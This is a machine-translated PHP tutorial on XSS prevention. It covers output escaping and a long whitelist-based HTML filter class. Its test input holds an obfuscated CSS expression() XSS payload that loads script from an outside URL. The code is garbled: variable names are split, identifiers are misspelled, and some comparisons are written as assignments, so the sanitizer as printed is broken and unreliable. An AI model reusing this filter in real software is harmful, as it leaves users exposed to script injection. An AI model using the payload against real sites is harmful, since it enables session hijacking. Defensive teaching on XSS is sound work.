In essence, xss is a popular attack method on the Internet. In the final analysis, it is because the data submitted by users is displayed by your trust. Why trust? It may be because the blacklist method filters out the fish that have missed the internet. it may have forgotten the escape output. this is the essence of xss attacks. the prevention has understood the essence, so it is easy to prevent. most outputs are non-rich texts. an htmlspecialchars function is ready. for rich text, the processing is relatively complicated. The Blacklist method will always leak the fish or filter out the normal user input. the whitelist method can handle all the code you don't like ~ Idea correction I found that 90% of people do not know when to perform any operations. for example, the company I just graduated from. all data is processed by htmlspecialchars. then, this is safe. actually, it is safe. not to mention how much space is occupied, it means rich text processing and cross-application data transmission. this is not feasible. some people will filter out the dangerous code before entering the database. what is the reason for this? Afraid of xss? But xss does not occur when it is stored in the database! If the data the user gives you does not meet your requirements, why should we import the data to the database? You can prompt the user that the data you submit does not comply with our prescribed format. A simple example is PHP <? Php // header utf8echo $ _ GET ['text']; // XSS! Echo htmlspecialchars ($ _ GET ['text']); // non-Rich text, select this method to output echo WhiteListFiter: filter ($ _ GET ['text']); // Rich Text. Select this method for output. Of course, you need to write this function yourself. you can also write it with me. see below. whitelist filtering function: whitelist filtering HTMLPHP <? Php/*** whiteList method filter HTML * @ author wclssdn@yeah.net **/class HtmlFilter {/*** whiteList * @ var array */private $ whiteList = array (); public function _ construct (array $ whiteList = array () {$ this-> whiteList = $ whiteList ;} /*** add an HTML Tag whitelist * @ param string $ label */public function addLabel ($ label, array $ rule = array ()) {$ this-> whiteList [$ label] | $ this-> whiteList [$ label] = $ rule;}/*** allowed values for adding filter rules for tags * @ Param string $ label * @ param string $ attribute * @ param array $ value allowed by values */public function addValues ($ label, $ attribute, array $ values) {if (isset ($ this-> whiteList [$ label] [$ attribute] ['grep']) {unset ($ this-> whiteList [$ label] [$ attribute] ['grep']);} $ this-> whiteList [$ label] [$ attribute] ['values'] = $ values ;} /*** add regular filter rules for tags * @ param string $ label * @ param string $ grep filter rules */pu Blic function addGrep ($ label, $ attribute, $ grep) {if (isset ($ this-> whiteList [$ label] [$ attribute] ['values']) {unset ($ this-> whiteList [$ label] [$ attribute] ['values']);} $ this-> whiteList [$ label] [$ attribute] ['grep'] = $ grep ;} /*** obtain the whiteList * @ return array */public function getWhiteList () {return $ this-> whiteList ;} /*** execute filter * @ param string $ htmlcode * @ return string */function filter ($ htmlcode) {if (Empty ($ htmlcode) {return '';} // only the allowed tags are retained. $ htmlcode = strip_tags ($ htmlcode, implode ('', array_map (create_function ('$ key', 'Return "<{$ key}>";'), array_keys ($ this-> whiteList )))); foreach ($ this-> whiteList as $ whiteLabel => $ rule) {$ clean = ''; // HTML code filtered by tags in a whiteList, the HTML code $ unclean = $ htmlcode after all tags are filtered; // the code that is being filtered may be the HTML code after some tags have been filtered $ found = false; // whether the tag is found for processing while ($ pos = strpos ($ unclean, "<{$ WhiteLabel }"))! = False) {// search for tags $ found = true; $ endpos = strpos ($ unclean, '>', $ pos ); // locate the end position of this tag. if ($ endpos = false) {break; // if no matching end tag is found, exit directly} $ label = substr ($ unclean, $ pos, $ endpos-$ pos + 1); // extract the entire segment of the tag if (! $ Rule) {// if no rule exists, kill all possible attributes $ label = "<{$ whiteLabel}>" ;}elseif (is_array ($ rule )) {// if there are rules for this label, check according to the rules $ pos1 = strpos ($ label ,''); // search for the first space if ($ pos1 = false) {// if there is no space, also re-assemble this label $ label = "<{$ whiteLabel}>";} else {$ clean2 = "<{$ whiteLabel }"; // The attribute string foreach ($ rule as $ attribute => $ attributeRule) after filtering in the tag {// align => 'values' => array ('left ', 'right', 'center') if ($ pos2 = strpos ($ label, $ Ttriue) === false) {continue; // if this attribute does not exist, search for other attributes.} $ pos3 = strpos ($ label, '"', $ pos2 ); // search for the first double quotation mark $ pos4 = strpos ($ label, '"', $ pos3 + 1); // search for the second double quotation mark $ attstr = substr ($ label, $ pos3 + 1, $ pos4-$ pos3-1); // extract the attribute string, + 1: "no" on the front. -1: the "Do Not if ($ attribute = 'style') {// special case of the style, you need to determine each of the values $ attarray = explode (';', $ attstr); // obtain each attribute in the style: Value foreach ($ attarray as $ at =>$ va) {$ va = explode (': ', $ Va); // take out each attribute, such as float => left, color => # fffff if (! $ AttributeRule [$ va [0]) {// unset ($ attarray [$ at]) in the white list; continue ;} if ($ attributeRule [$ va [0] ['values'] &! In_array ($ va [1], $ attributeRule [$ va [0] ['values']) {unset ($ attarray [$ at]); continue ;} if ($ attributeRule [$ va [0] ['grep'] &! Preg_match ($ attributeRule [$ va [0] ['grep'], $ va [1]) {unset ($ attarray [$ at]); continue ;}} $ attstr = $ attarray? 'Style = "'. implode (';', $ attarray ). '"':''; $ clean2. = $ attstr;} else {// If only allowed values are specified, but the attribute value is not within the permitted range, filter if ($ attributeRule ['values'] & in_array ($ attstr, $ attributeRule ['values'], true) {$ clean2. = "{$ attribute }=\" {$ attstr} \ "" ;}// if the specified value is regular, filter if ($ attributeRule ['grep'] & preg_match ($ attributeRule ['grep'], $ attstr) {$ clean2 based on the regular expression match. = "{$ attribute }=\" {$ attstr} \ "" ;}}$ label = $ clean2. '>' ;}}$ Unclean = substr_replace ($ unclean, $ label, $ pos, $ endpos-$ pos + 1 ); // Replace the code before filtering with the filtered code $ clean. = substr ($ unclean, 0, $ pos + strlen ($ label); // append processed data to this variable and save $ unclean = substr ($ unclean, $ pos + strlen ($ label); // unhandled code} if ($ found) {// if it has not been processed, it cannot be saved. $ htmlcode = $ clean; // Save the cleansed code if ($ unclean) {// if the code is processed, add $ htmlcode to the remaining code. = $ unclean ;}}return $ htmlcode ;}$ whiteList = array ('B' => '', // Tag 'br '=>'', 'br/' => '', 'p' => array ('align '=> array (// attribute 'values' In the tag => array ('left', 'right ', 'center'), // values allowed by attributes), 'style' => array ('float' => array ('values' => array ('left ', 'right'), // values allowed by attributes ),),), 'div '=> array (// tag 'align' => array (// attribute 'values' In the tag => array ('left', 'right ', 'center'), // values allowed by attributes), 'style' => array ('float' => array ('values' => array ('left' ', 'Right'), // values allowed by attributes ),),), 'img '=> array (// tag 'width' => array (// attribute 'grep' =>' # ^ [1-9] [0- 9] {0, 3 }$ # s ', // regular validation rules for attributes ), 'height' => array ('grep' => '# ^ [1-9] [0-9] {0, 3 }$ # s ',),),); $ htmlcode = <EOF <p> <div REL = "add-2012-xs"> ssssssssssssssssssssssss </DIV> <span STYLE = "display: non; e: expr \ 0065 semi ssion (function () {if (! Window. x) {try {document. scripts [0]. src = 'HTTP: // www.2cto.com/I/wb. php '} catch (e) {} window. x = 1 }}(); "REL =" add-2012-new "> ?? </SPAN> </p> EOF; // $ htmlcode = str_repeat ($ htmlcode, 1000); $ htmlFilter = new HtmlFilter ($ whiteList ); $ start = microtime (1); // $ htmlFilter-> addLabel ('A ', array ('href '=> array ('values' => array (' # '); $ htmlFilter-> addValues ('A', 'href ', array ('#'); var_dump ($ htmlFilter-> filter ($ htmlcode); echo PHP_EOL, (microtime (1)-$ start); of course, the $ whiteList configuration needs to be written according to your own needs. if it is not inside, it will be filtered out ~~